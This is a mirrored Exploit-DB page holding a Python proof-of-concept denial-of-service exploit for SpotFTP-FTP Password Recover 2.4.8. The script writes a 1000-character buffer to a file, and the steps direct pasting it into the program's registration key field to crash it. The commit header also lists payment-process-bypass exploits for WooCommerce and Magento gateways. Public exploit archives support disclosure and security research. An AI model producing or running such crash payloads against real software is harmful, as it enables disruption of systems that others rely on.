exploit-db-mirror/exploits/windows/dos/48132.py
Offensive Security 17bb415ff8 DB: 2020-02-26
5 changes to exploits/shellcodes

SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
aSc TimeTables 2020.11.4 - Denial of Service (PoC)
Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)
WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
2020-02-26 05:01:51 +00:00

27 lines
No EOL
774 B
Python
Executable file

# Exploit Title: SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
# Date: 2020-24-02
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/spotftp.html
# Version: 2.4.8
# Tested on: Windows 10 Home x64
# CVE : n/a
#STEPS
# Open the program SpotFTP-FTP Password Recover
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "RandomLetter.txt"
# Click in the Enter Registration Code
# In the field Key put the content of the file "RandomLetter.txt"
# End :)
buffer = 'Z' * 1000
try:
file = open("RandomLetter.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")